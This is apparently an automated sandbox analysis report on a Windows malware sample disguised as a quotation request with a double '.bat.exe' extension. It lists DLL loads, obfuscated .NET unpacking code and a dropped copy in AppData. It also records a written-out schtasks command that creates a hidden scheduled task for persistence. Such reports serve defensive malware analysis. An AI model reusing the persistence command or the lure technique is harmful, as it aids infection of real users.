Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, InnerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: NuDUTBObHpKADz.exe.0.dr, InnerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs .Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs .Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0153DB84 pushfd ; ret 0_2_0153DB89
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07418918 push esp; iretd 0_2_07418919
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9241 push es; ret 9_2_06DE9244
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_0111DB84 pushfd ; ret 10_2_0111DB89
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D0D70 pushfd ; retf 10_2_053D0D7D
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269891E pushad ; iretd 14_2_0269891F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02698C2F pushfd ; iretd 14_2_02698C30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02698DDF push esp; iretd 14_2_02698DE0
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: section name: .text entropy: 7.5503065152862066
Source: NuDUTBObHpKADz.exe.0.dr Static PE information: section name: .text entropy: 7.5503065152862066
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, jf4Qf9XFgnwgV28YTi.cs High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, EXP714sBm2ctecZFQ5.cs High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, vfkoEZCFRkJoTb50MAj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, NZGTi0WPFvt2i5LQMG.cs High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, dBMNChvaYpUXNoIXaf.cs High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, mjll2lncEU9TxwTknr.cs High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, By1IY6fiKcunMsajFa.cs High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YChN0VCCf5YB3QfasmB.cs High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Lv1bZR1o53kqNJhWi9.cs High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, LF6Z39NPmJiiGMGn5i.cs High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, oxcHW9d8Tk42VoYgoA.cs High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Y06dj4BVu05CPVc5SN.cs High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, C9unB7URCgbFq78hEl.cs High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YXd5RkTUGDmJACNkFp.cs High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, h6mhv9m54O6mTAWZxY.cs High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, jf4Qf9XFgnwgV28YTi.cs High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, EXP714sBm2ctecZFQ5.cs High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, vfkoEZCFRkJoTb50MAj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, NZGTi0WPFvt2i5LQMG.cs High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, dBMNChvaYpUXNoIXaf.cs High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, mjll2lncEU9TxwTknr.cs High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, By1IY6fiKcunMsajFa.cs High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YChN0VCCf5YB3QfasmB.cs High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Lv1bZR1o53kqNJhWi9.cs High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, LF6Z39NPmJiiGMGn5i.cs High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, oxcHW9d8Tk42VoYgoA.cs High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Y06dj4BVu05CPVc5SN.cs High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, C9unB7URCgbFq78hEl.cs High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YXd5RkTUGDmJACNkFp.cs High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, h6mhv9m54O6mTAWZxY.cs High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
Drops PE files
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Creates or modifies windows services
Source: C:\Windows\System32\wbem\WMIADAP.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
